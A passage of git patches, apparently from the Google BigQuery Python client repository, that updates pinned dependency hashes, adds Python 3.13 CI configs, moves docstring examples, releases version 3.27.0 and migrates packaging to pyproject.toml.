--hash=sha256:cca4bb0f2df5504f02f6f8a775b6e416ff9b0b3b16f7ee80b5a3153d9b804473 +pyasn1==0.6.1 \ + --hash=sha256:0d632f46f2ba09143da3a8afe9e33fb6f92fa2320ab7e886e2d0f7672af84629 \ + --hash=sha256:6f580d2bdd84365380830acf45550f2511469f673cb4a5ae3857a3170128b034 # via # pyasn1-modules # rsa -pyasn1-modules==0.4.0 \ - --hash=sha256:831dbcea1b177b28c9baddf4c6d1013c24c3accd14a1873fffaa6a2e905f17b6 \ - --hash=sha256:be04f15b66c206eed667e0bb5ab27e2b1855ea54a842e5037738099e8ca4ae0b +pyasn1-modules==0.4.1 \ + --hash=sha256:49bfa96b45a292b711e986f222502c1c9a5e1f4e568fc30e2574a6c7d07838fd \ + --hash=sha256:c28e2dbf9c06ad61c71a075c7e0f9fd0f1b0bb2d2ad4377f240d33ac2ab60a7c # via google-auth pycparser==2.22 \ --hash=sha256:491c8be9c040f5390f5bf44a5b07752bd07f56edf992381b05c701439eec10f6 \ @@ -449,9 +419,9 @@ pygments==2.18.0 \ # via # readme-renderer # rich -pyjwt==2.8.0 \ - --hash=sha256:57e28d156e3d5c10088e0c68abb90bfac3df82b40a71bd0daa20c65ccd5c23de \ - --hash=sha256:59127c392cc44c2da5bb3192169a91f429924e17aff6534d70fdc02ab3e04320 +pyjwt==2.9.0 \ + --hash=sha256:3b02fb0f44517787776cf48f2ae25d8e14f300e6d7545a4315cee571a415e850 \ + --hash=sha256:7e1e5b56cc735432a7369cbfa0efe50fa113ebecdc04ae6922deba8b84582d0c # via 
gcp-releasetool pyperclip==1.9.0 \ --hash=sha256:b7de0142ddc81bfc5c7507eea19da920b92252b548b96186caf94a5e2527d310 @@ -481,9 +451,9 @@ rfc3986==2.0.0 \ --hash=sha256:50b1502b60e289cb37883f3dfd34532b8873c7de9f49bb546641ce9cbd256ebd \ --hash=sha256:97aacf9dbd4bfd829baad6e6309fa6573aaf1be3f6fa735c8ab05e46cecb261c # via twine -rich==13.7.1 \ - --hash=sha256:4edbae314f59eb482f54e9e30bf00d33350aaa94f4bfcd4e9e3110e64d0d7222 \ - --hash=sha256:9be308cb1fe2f1f57d67ce99e95af38a1e2bc71ad9813b0e247cf7ffbcc3a432 +rich==13.9.2 \ + --hash=sha256:51a2c62057461aaf7152b4d611168f93a9fc73068f8ded2790f29fe2b5366d0c \ + --hash=sha256:8c82a3d3f8dcfe9e734771313e606b39d8247bb6b826e196f4914b333b743cf1 # via twine rsa==4.9 \ --hash=sha256:90260d9058e514786967344d0ef75fa8727eed8a7d2e43ce9f4bcf1b536174f7 \ @@ -499,9 +469,9 @@ six==1.16.0 \ # via # gcp-docuploader # python-dateutil -tomli==2.0.1 \ - --hash=sha256:939de3e7a6161af0c887ef91b7d41a53e7c5a1ca976325f429cb46ea9bc30ecc \ - --hash=sha256:de526c12914f0c550d15924c62d72abc48d6fe7364aa87328337a31007fe8a4f +tomli==2.0.2 \ + --hash=sha256:2ebe24485c53d303f690b0ec092806a085f07af5a5aa1464f3931eec36caaa38 \ + --hash=sha256:d46d457a85337051c36524bc5349dd91b1877838e2979ac5ced3e710ed8a60ed # via nox twine==5.1.1 \ --hash=sha256:215dbe7b4b94c2c50a7315c0275d2258399280fbb7d04182c7e55e24b5f93997 \ @@ -510,28 +480,30 @@ twine==5.1.1 \ typing-extensions==4.12.2 \ --hash=sha256:04e5ca0351e0f3f85c6853954072df659d0d13fac324d0072316b67d7794700d \ --hash=sha256:1a7ead55c7e559dd4dee8856e3a88b41225abfe1ce8df57b7c13915fe121ffb8 - # via -r requirements.in -urllib3==2.2.2 \ - --hash=sha256:a448b2f64d686155468037e1ace9f2d2199776e17f0a46610480d311f73e3472 \ - --hash=sha256:dd505485549a7a552833da5e6063639d0d177c04f23bc3864e41e5dc5f612168 + # via + # -r requirements.in + # rich +urllib3==2.2.3 \ + --hash=sha256:ca899ca043dcb1bafa3e262d73aa25c465bfb49e0bd9dd5d59f1d0acba2f8fac \ + --hash=sha256:e7d814a81dad81e6caf2ec9fdedb284ecc9c73076b62654547cc64ccdcae26e9 # via # 
requests # twine -virtualenv==20.26.3 \ - --hash=sha256:4c43a2a236279d9ea36a0d76f98d84bd6ca94ac4e0f4a3b9d46d05e10fea542a \ - --hash=sha256:8cc4a31139e796e9a7de2cd5cf2489de1217193116a8fd42328f1bd65f434589 +virtualenv==20.26.6 \ + --hash=sha256:280aede09a2a5c317e409a00102e7077c6432c5a38f0ef938e643805a7ad2c48 \ + --hash=sha256:7345cc5b25405607a624d8418154577459c3e0277f5466dd79c49d5e492995f2 # via nox -wheel==0.43.0 \ - --hash=sha256:465ef92c69fa5c5da2d1cf8ac40559a8c940886afcef87dcf14b9470862f1d85 \ - --hash=sha256:55c570405f142630c6b9f72fe09d9b67cf1477fcf543ae5b8dcb1f5b7377da81 +wheel==0.44.0 \ + --hash=sha256:2376a90c98cc337d18623527a97c31797bd02bad0033d41547043a1cbfbe448f \ + --hash=sha256:a29c3f2817e95ab89aa4660681ad547c0e9547f20e75b0562fe7723c9a2a9d49 # via -r requirements.in -zipp==3.19.2 \ - --hash=sha256:bf1dcf6450f873a13e952a29504887c89e6de7506209e5b1bcc3460135d4de19 \ - --hash=sha256:f091755f667055f2d02b32c53771a7a6c8b47e1fdbc4b72a8b9072b3eef8015c +zipp==3.20.2 \ + --hash=sha256:a817ac80d6cf4b23bf7f2828b7cabf326f15a001bea8b1f9b49631780ba28350 \ + --hash=sha256:bc9eb26f4506fda01b81bcde0ca78103b6e62f991b381fec825435c836edbc29 # via importlib-metadata # The following packages are considered to be unsafe in a requirements file: -setuptools==70.2.0 \ - --hash=sha256:b8b8060bb426838fbe942479c90296ce976249451118ef566a5a0b7d8b78fb05 \ - --hash=sha256:bd63e505105011b25c3c11f753f7e3b8465ea739efddaccef8f0efac2137bac1 +setuptools==75.1.0 \ + --hash=sha256:35ab7fd3bcd95e6b7fd704e4a1539513edad446c097797f2985e0e4b960772f2 \ + --hash=sha256:d59a21b17a275fb872a9c3dae73963160ae079f1049ed956880cd7c09b120538 # via -r requirements.in diff --git a/.kokoro/samples/python3.13/common.cfg b/.kokoro/samples/python3.13/common.cfg new file mode 100644 index 000000000..ee9688995 --- /dev/null +++ b/.kokoro/samples/python3.13/common.cfg @@ -0,0 +1,40 @@ +# Format: //devtools/kokoro/config/proto/build.proto + +# Build logs will be here +action { + define_artifacts { + regex: 
"**/*sponge_log.xml" + } +} + +# Specify which tests to run +env_vars: { + key: "RUN_TESTS_SESSION" + value: "py-3.13" +} + +# Declare build specific Cloud project. +env_vars: { + key: "BUILD_SPECIFIC_GCLOUD_PROJECT" + value: "python-docs-samples-tests-313" +} + +env_vars: { + key: "TRAMPOLINE_BUILD_FILE" + value: "github/python-bigquery/.kokoro/test-samples.sh" +} + +# Configure the docker image for kokoro-trampoline. +env_vars: { + key: "TRAMPOLINE_IMAGE" + value: "gcr.io/cloud-devrel-kokoro-resources/python-samples-testing-docker" +} + +# Download secrets for samples +gfile_resources: "/bigstore/cloud-devrel-kokoro-resources/python-docs-samples" + +# Download trampoline resources. +gfile_resources: "/bigstore/cloud-devrel-kokoro-resources/trampoline" + +# Use the trampoline script to run in docker. +build_file: "python-bigquery/.kokoro/trampoline_v2.sh" diff --git a/.kokoro/samples/python3.13/continuous.cfg b/.kokoro/samples/python3.13/continuous.cfg new file mode 100644 index 000000000..a1c8d9759 --- /dev/null +++ b/.kokoro/samples/python3.13/continuous.cfg @@ -0,0 +1,6 @@ +# Format: //devtools/kokoro/config/proto/build.proto + +env_vars: { + key: "INSTALL_LIBRARY_FROM_SOURCE" + value: "True" +} \ No newline at end of file diff --git a/.kokoro/samples/python3.13/periodic-head.cfg b/.kokoro/samples/python3.13/periodic-head.cfg new file mode 100644 index 000000000..5aa01bab5 --- /dev/null +++ b/.kokoro/samples/python3.13/periodic-head.cfg @@ -0,0 +1,11 @@ +# Format: //devtools/kokoro/config/proto/build.proto + +env_vars: { + key: "INSTALL_LIBRARY_FROM_SOURCE" + value: "True" +} + +env_vars: { + key: "TRAMPOLINE_BUILD_FILE" + value: "github/python-bigquery/.kokoro/test-samples-against-head.sh" +} diff --git a/.kokoro/samples/python3.13/periodic.cfg b/.kokoro/samples/python3.13/periodic.cfg new file mode 100644 index 000000000..71cd1e597 --- /dev/null +++ b/.kokoro/samples/python3.13/periodic.cfg @@ -0,0 +1,6 @@ +# Format: //devtools/kokoro/config/proto/build.proto 
+ +env_vars: { + key: "INSTALL_LIBRARY_FROM_SOURCE" + value: "False" +} diff --git a/.kokoro/samples/python3.13/presubmit.cfg b/.kokoro/samples/python3.13/presubmit.cfg new file mode 100644 index 000000000..a1c8d9759 --- /dev/null +++ b/.kokoro/samples/python3.13/presubmit.cfg @@ -0,0 +1,6 @@ +# Format: //devtools/kokoro/config/proto/build.proto + +env_vars: { + key: "INSTALL_LIBRARY_FROM_SOURCE" + value: "True" +} \ No newline at end of file diff --git a/.kokoro/test-samples-impl.sh b/.kokoro/test-samples-impl.sh index 55910c8ba..53e365bc4 100755 --- a/.kokoro/test-samples-impl.sh +++ b/.kokoro/test-samples-impl.sh @@ -33,7 +33,8 @@ export PYTHONUNBUFFERED=1 env | grep KOKORO # Install nox -python3.9 -m pip install --upgrade --quiet nox +# `virtualenv==20.26.6` is added for Python 3.7 compatibility +python3.9 -m pip install --upgrade --quiet nox virtualenv==20.26.6 # Use secrets acessor service account to get secrets if [[ -f "${KOKORO_GFILE_DIR}/secrets_viewer_service_account.json" ]]; then diff --git a/CONTRIBUTING.rst b/CONTRIBUTING.rst index 7be61e6b6..1900c5e36 100644 --- a/CONTRIBUTING.rst +++ b/CONTRIBUTING.rst @@ -22,7 +22,7 @@ In order to add a feature: documentation. - The feature must work fully on the following CPython versions: - 3.7, 3.8, 3.9, 3.10, 3.11 and 3.12 on both UNIX and Windows. + 3.7, 3.8, 3.9, 3.10, 3.11, 3.12 and 3.13 on both UNIX and Windows. - The feature must not add unnecessary dependencies (where "unnecessary" is of course subjective, but new dependencies should @@ -72,7 +72,7 @@ We use `nox `__ to instrument our tests. - To run a single unit test:: - $ nox -s unit-3.12 -- -k + $ nox -s unit-3.13 -- -k .. note:: @@ -227,6 +227,7 @@ We support: - `Python 3.10`_ - `Python 3.11`_ - `Python 3.12`_ +- `Python 3.13`_ .. _Python 3.7: https://docs.python.org/3.7/ .. _Python 3.8: https://docs.python.org/3.8/ @@ -234,6 +235,7 @@ We support: .. _Python 3.10: https://docs.python.org/3.10/ .. _Python 3.11: https://docs.python.org/3.11/ .. 
_Python 3.12: https://docs.python.org/3.12/ +.. _Python 3.13: https://docs.python.org/3.13/ Supported versions can be found in our ``noxfile.py`` `config`_. diff --git a/samples/desktopapp/noxfile.py b/samples/desktopapp/noxfile.py index 3b7135946..c9a3d1ecb 100644 --- a/samples/desktopapp/noxfile.py +++ b/samples/desktopapp/noxfile.py @@ -89,7 +89,7 @@ def get_pytest_env_vars() -> Dict[str, str]: # DO NOT EDIT - automatically generated. # All versions used to test samples. -ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12"] +ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13"] # Any default versions that should be ignored. IGNORED_VERSIONS = TEST_CONFIG["ignored_versions"] diff --git a/samples/geography/noxfile.py b/samples/geography/noxfile.py index 3b7135946..c9a3d1ecb 100644 --- a/samples/geography/noxfile.py +++ b/samples/geography/noxfile.py @@ -89,7 +89,7 @@ def get_pytest_env_vars() -> Dict[str, str]: # DO NOT EDIT - automatically generated. # All versions used to test samples. -ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12"] +ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13"] # Any default versions that should be ignored. IGNORED_VERSIONS = TEST_CONFIG["ignored_versions"] diff --git a/samples/magics/noxfile.py b/samples/magics/noxfile.py index 3b7135946..c9a3d1ecb 100644 --- a/samples/magics/noxfile.py +++ b/samples/magics/noxfile.py @@ -89,7 +89,7 @@ def get_pytest_env_vars() -> Dict[str, str]: # DO NOT EDIT - automatically generated. # All versions used to test samples. -ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12"] +ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13"] # Any default versions that should be ignored. 
IGNORED_VERSIONS = TEST_CONFIG["ignored_versions"] diff --git a/samples/notebooks/noxfile.py b/samples/notebooks/noxfile.py index 3b7135946..c9a3d1ecb 100644 --- a/samples/notebooks/noxfile.py +++ b/samples/notebooks/noxfile.py @@ -89,7 +89,7 @@ def get_pytest_env_vars() -> Dict[str, str]: # DO NOT EDIT - automatically generated. # All versions used to test samples. -ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12"] +ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13"] # Any default versions that should be ignored. IGNORED_VERSIONS = TEST_CONFIG["ignored_versions"] diff --git a/samples/snippets/noxfile.py b/samples/snippets/noxfile.py index 3b7135946..c9a3d1ecb 100644 --- a/samples/snippets/noxfile.py +++ b/samples/snippets/noxfile.py @@ -89,7 +89,7 @@ def get_pytest_env_vars() -> Dict[str, str]: # DO NOT EDIT - automatically generated. # All versions used to test samples. -ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12"] +ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13"] # Any default versions that should be ignored. IGNORED_VERSIONS = TEST_CONFIG["ignored_versions"] From fef8b886bc86d355c7745585fc53dc8a5a019ab1 Mon Sep 17 00:00:00 2001 From: "Leah E. Cole" <6719667+leahecole@users.noreply.github.com> Date: Fri, 1 Nov 2024 12:53:52 -0400 Subject: [PATCH 023/202] chore: two fixit fixes (#2050) --- google/cloud/bigquery/client.py | 34 ++++++++++++++++++--------------- 1 file changed, 19 insertions(+), 15 deletions(-) diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index 1c222f2dd..52c5084e3 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -328,6 +328,15 @@ def get_service_account_email( ) -> str: """Get the email address of the project's BigQuery service account + Example: + + .. 
code-block:: python + + from google.cloud import bigquery + client = bigquery.Client() + client.get_service_account_email() + # returns an email similar to: my_service_account@my-project.iam.gserviceaccount.com + Note: This is the service account that BigQuery uses to manage tables encrypted by a key in KMS. @@ -345,13 +354,6 @@ def get_service_account_email( str: service account email address - Example: - - >>> from google.cloud import bigquery - >>> client = bigquery.Client() - >>> client.get_service_account_email() - my_service_account@my-project.iam.gserviceaccount.com - """ if project is None: project = self.project @@ -629,9 +631,19 @@ def create_dataset( ) -> Dataset: """API call: create the dataset via a POST request. + See https://cloud.google.com/bigquery/docs/reference/rest/v2/datasets/insert + Example: + + .. code-block:: python + + from google.cloud import bigquery + client = bigquery.Client() + dataset = bigquery.Dataset('my_project.my_dataset') + dataset = client.create_dataset(dataset) + Args: dataset (Union[ \ google.cloud.bigquery.dataset.Dataset, \ @@ -658,14 +670,6 @@ def create_dataset( Raises: google.cloud.exceptions.Conflict: If the dataset already exists. 
- - Example: - - >>> from google.cloud import bigquery - >>> client = bigquery.Client() - >>> dataset = bigquery.Dataset('my_project.my_dataset') - >>> dataset = client.create_dataset(dataset) - """ dataset = self._dataset_from_arg(dataset) if isinstance(dataset, DatasetReference): From 53c289e032caf083505b33bef323878671b58cd9 Mon Sep 17 00:00:00 2001 From: "release-please[bot]" <55107282+release-please[bot]@users.noreply.github.com> Date: Thu, 7 Nov 2024 10:17:28 -0500 Subject: [PATCH 024/202] chore(main): release 3.27.0 (#2040) Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com> Co-authored-by: Chalmer Lowe --- CHANGELOG.md | 7 +++++++ google/cloud/bigquery/version.py | 2 +- 2 files changed, 8 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 5de99a6ca..989b7f020 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,6 +5,13 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.27.0](https://github.com/googleapis/python-bigquery/compare/v3.26.0...v3.27.0) (2024-11-01) + + +### Features + +* Updates to allow users to set max_stream_count ([#2039](https://github.com/googleapis/python-bigquery/issues/2039)) ([7372ad6](https://github.com/googleapis/python-bigquery/commit/7372ad659fd3316a602e90f224e9a3304d4c1419)) + ## [3.26.0](https://github.com/googleapis/python-bigquery/compare/v3.25.0...v3.26.0) (2024-09-25) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index ebc911253..8f4418777 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. -__version__ = "3.26.0" +__version__ = "3.27.0" From a4d9534a900f13ae7355904cda05097d781f27e3 Mon Sep 17 00:00:00 2001 From: "Leah E. 
Cole" <6719667+leahecole@users.noreply.github.com> Date: Thu, 7 Nov 2024 15:56:57 -0500 Subject: [PATCH 025/202] docs: render fields correctly for update calls (#2055) --- google/cloud/bigquery/client.py | 82 ++++++++++++++++----------------- 1 file changed, 41 insertions(+), 41 deletions(-) diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index 52c5084e3..97f239f7a 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -1184,6 +1184,19 @@ def update_dataset( must be provided. If a field is listed in ``fields`` and is ``None`` in ``dataset``, it will be deleted. + For example, to update the default expiration times, specify + both properties in the ``fields`` argument: + + .. code-block:: python + + bigquery_client.update_dataset( + dataset, + [ + "default_partition_expiration_ms", + "default_table_expiration_ms", + ] + ) + If ``dataset.etag`` is not ``None``, the update will only succeed if the dataset on the server has the same ETag. Thus reading a dataset with ``get_dataset``, changing its fields, @@ -1198,19 +1211,6 @@ def update_dataset( The properties of ``dataset`` to change. These are strings corresponding to the properties of :class:`~google.cloud.bigquery.dataset.Dataset`. - - For example, to update the default expiration times, specify - both properties in the ``fields`` argument: - - .. code-block:: python - - bigquery_client.update_dataset( - dataset, - [ - "default_partition_expiration_ms", - "default_table_expiration_ms", - ] - ) retry (Optional[google.api_core.retry.Retry]): How to retry the RPC. timeout (Optional[float]): @@ -1254,6 +1254,15 @@ def update_model( must be provided. If a field is listed in ``fields`` and is ``None`` in ``model``, the field value will be deleted. + For example, to update the descriptive properties of the model, + specify them in the ``fields`` argument: + + .. 
code-block:: python + + bigquery_client.update_model( + model, ["description", "friendly_name"] + ) + If ``model.etag`` is not ``None``, the update will only succeed if the model on the server has the same ETag. Thus reading a model with ``get_model``, changing its fields, and then passing it to @@ -1266,15 +1275,6 @@ def update_model( The properties of ``model`` to change. These are strings corresponding to the properties of :class:`~google.cloud.bigquery.model.Model`. - - For example, to update the descriptive properties of the model, - specify them in the ``fields`` argument: - - .. code-block:: python - - bigquery_client.update_model( - model, ["description", "friendly_name"] - ) retry (Optional[google.api_core.retry.Retry]): A description of how to retry the API call. timeout (Optional[float]): @@ -1318,6 +1318,15 @@ def update_routine( must be provided. If a field is listed in ``fields`` and is ``None`` in ``routine``, the field value will be deleted. + For example, to update the description property of the routine, + specify it in the ``fields`` argument: + + .. code-block:: python + + bigquery_client.update_routine( + routine, ["description"] + ) + .. warning:: During beta, partial updates are not supported. You must provide all fields in the resource. @@ -1336,15 +1345,6 @@ def update_routine( fields (Sequence[str]): The fields of ``routine`` to change, spelled as the :class:`~google.cloud.bigquery.routine.Routine` properties. - - For example, to update the description property of the routine, - specify it in the ``fields`` argument: - - .. code-block:: python - - bigquery_client.update_routine( - routine, ["description"] - ) retry (Optional[google.api_core.retry.Retry]): A description of how to retry the API call. timeout (Optional[float]): @@ -1392,6 +1392,16 @@ def update_table( must be provided. If a field is listed in ``fields`` and is ``None`` in ``table``, the field value will be deleted. 
+ For example, to update the descriptive properties of the table, + specify them in the ``fields`` argument: + + .. code-block:: python + + bigquery_client.update_table( + table, + ["description", "friendly_name"] + ) + If ``table.etag`` is not ``None``, the update will only succeed if the table on the server has the same ETag. Thus reading a table with ``get_table``, changing its fields, and then passing it to @@ -1403,16 +1413,6 @@ def update_table( fields (Sequence[str]): The fields of ``table`` to change, spelled as the :class:`~google.cloud.bigquery.table.Table` properties. - - For example, to update the descriptive properties of the table, - specify them in the ``fields`` argument: - - .. code-block:: python - - bigquery_client.update_table( - table, - ["description", "friendly_name"] - ) retry (Optional[google.api_core.retry.Retry]): A description of how to retry the API call. timeout (Optional[float]): From 9050ddca47f703c2630a49b278f3f3779469f66f Mon Sep 17 00:00:00 2001 From: "gcf-owl-bot[bot]" <78513119+gcf-owl-bot[bot]@users.noreply.github.com> Date: Mon, 11 Nov 2024 11:35:36 -0800 Subject: [PATCH 026/202] chore(python): remove obsolete release scripts and config files (#2057) Source-Link: https://github.com/googleapis/synthtool/commit/635751753776b1a7cabd4dcaa48013a96274372d Post-Processor: gcr.io/cloud-devrel-public-resources/owlbot-python:latest@sha256:91d0075c6f2fd6a073a06168feee19fa2a8507692f2519a1dc7de3366d157e99 Co-authored-by: Owl Bot --- .github/.OwlBot.lock.yaml | 4 ++-- .github/release-trigger.yml | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/.OwlBot.lock.yaml b/.github/.OwlBot.lock.yaml index 7672b49b6..b2770d4e0 100644 --- a/.github/.OwlBot.lock.yaml +++ b/.github/.OwlBot.lock.yaml @@ -13,5 +13,5 @@ # limitations under the License. 
docker: image: gcr.io/cloud-devrel-public-resources/owlbot-python:latest - digest: sha256:5cddfe2fb5019bbf78335bc55f15bc13e18354a56b3ff46e1834f8e540807f05 -# created: 2024-10-31T01:41:07.349286254Z + digest: sha256:91d0075c6f2fd6a073a06168feee19fa2a8507692f2519a1dc7de3366d157e99 +# created: 2024-11-11T16:13:09.302418532Z diff --git a/.github/release-trigger.yml b/.github/release-trigger.yml index 4bb79e58e..b975c190d 100644 --- a/.github/release-trigger.yml +++ b/.github/release-trigger.yml @@ -1,2 +1,2 @@ enabled: true -multiScmName: +multiScmName: python-bigquery From 0277f171a2d12c370120e3e82199667ad40e1a99 Mon Sep 17 00:00:00 2001 From: Anthonios Partheniou Date: Tue, 12 Nov 2024 09:48:26 -0500 Subject: [PATCH 027/202] build: Use python 3.10 for docs session (#2058) Co-authored-by: Lingqing Gan --- noxfile.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/noxfile.py b/noxfile.py index 2376309ff..750a6b459 100644 --- a/noxfile.py +++ b/noxfile.py @@ -462,7 +462,7 @@ def blacken(session): session.run("black", *BLACK_PATHS) -@nox.session(python="3.9") +@nox.session(python="3.10") @_calculate_duration def docs(session): """Build the docs.""" From b2f33df4dd8627cab1571cde9f7f98a345fa6957 Mon Sep 17 00:00:00 2001 From: "gcf-owl-bot[bot]" <78513119+gcf-owl-bot[bot]@users.noreply.github.com> Date: Tue, 12 Nov 2024 14:05:24 -0500 Subject: [PATCH 028/202] chore(python): update dependencies in .kokoro/docker/docs (#2060) Source-Link: https://github.com/googleapis/synthtool/commit/59171c8f83f3522ce186e4d110d27e772da4ba7a Post-Processor: gcr.io/cloud-devrel-public-resources/owlbot-python:latest@sha256:2ed982f884312e4883e01b5ab8af8b6935f0216a5a2d82928d273081fc3be562 Co-authored-by: Owl Bot Co-authored-by: Chalmer Lowe --- .github/.OwlBot.lock.yaml | 4 ++-- .kokoro/docker/docs/requirements.txt | 20 ++++++++++---------- 2 files changed, 12 insertions(+), 12 deletions(-) diff --git a/.github/.OwlBot.lock.yaml b/.github/.OwlBot.lock.yaml index 
b2770d4e0..6301519a9 100644 --- a/.github/.OwlBot.lock.yaml +++ b/.github/.OwlBot.lock.yaml @@ -13,5 +13,5 @@ # limitations under the License. docker: image: gcr.io/cloud-devrel-public-resources/owlbot-python:latest - digest: sha256:91d0075c6f2fd6a073a06168feee19fa2a8507692f2519a1dc7de3366d157e99 -# created: 2024-11-11T16:13:09.302418532Z + digest: sha256:2ed982f884312e4883e01b5ab8af8b6935f0216a5a2d82928d273081fc3be562 +# created: 2024-11-12T12:09:45.821174897Z diff --git a/.kokoro/docker/docs/requirements.txt b/.kokoro/docker/docs/requirements.txt index 66eacc82f..8bb076459 100644 --- a/.kokoro/docker/docs/requirements.txt +++ b/.kokoro/docker/docs/requirements.txt @@ -1,5 +1,5 @@ # -# This file is autogenerated by pip-compile with Python 3.9 +# This file is autogenerated by pip-compile with Python 3.10 # by the following command: # # pip-compile --allow-unsafe --generate-hashes requirements.in @@ -8,9 +8,9 @@ argcomplete==3.5.1 \ --hash=sha256:1a1d148bdaa3e3b93454900163403df41448a248af01b6e849edc5ac08e6c363 \ --hash=sha256:eb1ee355aa2557bd3d0145de7b06b2a45b0ce461e1e7813f5d066039ab4177b4 # via nox -colorlog==6.8.2 \ - --hash=sha256:3e3e079a41feb5a1b64f978b5ea4f46040a94f11f0e8bbb8261e3dbbeca64d44 \ - --hash=sha256:4dcbb62368e2800cb3c5abd348da7e53f6c362dda502ec27c560b2e58a66bd33 +colorlog==6.9.0 \ + --hash=sha256:5906e71acd67cb07a71e779c47c4bcb45fb8c2993eebe9e5adcd6a6f1b283eff \ + --hash=sha256:bfba54a1b93b94f54e1f4fe48395725a3d92fd2a4af702f6bd70946bdc0c6ac2 # via nox distlib==0.3.9 \ --hash=sha256:47f8c22fd27c27e25a65601af709b38e4f0a45ea4fc2e710f65755fa8caaaf87 \ @@ -24,9 +24,9 @@ nox==2024.10.9 \ --hash=sha256:1d36f309a0a2a853e9bccb76bbef6bb118ba92fa92674d15604ca99adeb29eab \ --hash=sha256:7aa9dc8d1c27e9f45ab046ffd1c3b2c4f7c91755304769df231308849ebded95 # via -r requirements.in -packaging==24.1 \ - --hash=sha256:026ed72c8ed3fcce5bf8950572258698927fd1dbda10a5e981cdf0ac37f4f002 \ - --hash=sha256:5b8f2217dbdbd2f7f384c41c628544e6d52f2d0f53c6d0c3ea61aa5d1d7ff124 
+packaging==24.2 \ + --hash=sha256:09abb1bccd265c01f4a3aa3f7a7db064b36514d2cba19a2f694fe6150451a759 \ + --hash=sha256:c228a6dc5e932d346bc5739379109d49e8853dd8223571c7c5b55260edc0b97f # via nox platformdirs==4.3.6 \ --hash=sha256:357fb2acbc885b0419afd3ce3ed34564c13c9b95c89360cd9563f73aa5e2b907 \ @@ -36,7 +36,7 @@ tomli==2.0.2 \ --hash=sha256:2ebe24485c53d303f690b0ec092806a085f07af5a5aa1464f3931eec36caaa38 \ --hash=sha256:d46d457a85337051c36524bc5349dd91b1877838e2979ac5ced3e710ed8a60ed # via nox -virtualenv==20.26.6 \ - --hash=sha256:280aede09a2a5c317e409a00102e7077c6432c5a38f0ef938e643805a7ad2c48 \ - --hash=sha256:7345cc5b25405607a624d8418154577459c3e0277f5466dd79c49d5e492995f2 +virtualenv==20.27.1 \ + --hash=sha256:142c6be10212543b32c6c45d3d3893dff89112cc588b7d0879ae5a1ec03a47ba \ + --hash=sha256:f11f1b8a29525562925f745563bfd48b189450f61fb34c4f9cc79dd5aa32a1f4 # via nox From 106161180ead01aca1ead909cf06ca559f68666d Mon Sep 17 00:00:00 2001 From: Rin Arakaki Date: Wed, 13 Nov 2024 22:20:57 +0900 Subject: [PATCH 029/202] feat: migrate to pyproject.toml (#2041) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Migrate to pyproject.toml * Update * Add copyright notice * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * Update pyproject.toml --------- Co-authored-by: Owl Bot Co-authored-by: Chalmer Lowe --- pyproject.toml | 104 +++++++++++++++++++++++++++++++ setup.py | 128 +-------------------------------------- tests/unit/test_table.py | 2 +- 3 files changed, 107 insertions(+), 127 deletions(-) create mode 100644 pyproject.toml diff --git a/pyproject.toml b/pyproject.toml new file mode 100644 index 000000000..44a958323 --- /dev/null +++ b/pyproject.toml @@ -0,0 +1,104 @@ +# Copyright 2024 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. 
+# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +[build-system] +requires = ["setuptools"] +build-backend = "setuptools.build_meta" + +[project] +name = "google-cloud-bigquery" +authors = [{ name = "Google LLC", email = "googleapis-packages@google.com" }] +license = { text = "Apache 2.0" } +requires-python = ">=3.7" +description = "Google BigQuery API client library" +readme = "README.rst" +classifiers = [ + # Should be one of: + # "Development Status :: 3 - Alpha" + # "Development Status :: 4 - Beta" + # "Development Status :: 5 - Production/Stable" + "Development Status :: 5 - Production/Stable", + "Intended Audience :: Developers", + "License :: OSI Approved :: Apache Software License", + "Programming Language :: Python", + "Programming Language :: Python :: 3", + "Programming Language :: Python :: 3.7", + "Programming Language :: Python :: 3.8", + "Programming Language :: Python :: 3.9", + "Programming Language :: Python :: 3.10", + "Programming Language :: Python :: 3.11", + "Programming Language :: Python :: 3.12", + "Operating System :: OS Independent", + "Topic :: Internet", +] +dependencies = [ + "google-api-core[grpc] >= 2.11.1, < 3.0.0dev", + "google-auth >= 2.14.1, < 3.0.0dev", + "google-cloud-core >= 2.4.1, < 3.0.0dev", + "google-resumable-media >= 2.0.0, < 3.0dev", + "packaging >= 20.0.0", + "python-dateutil >= 2.7.3, 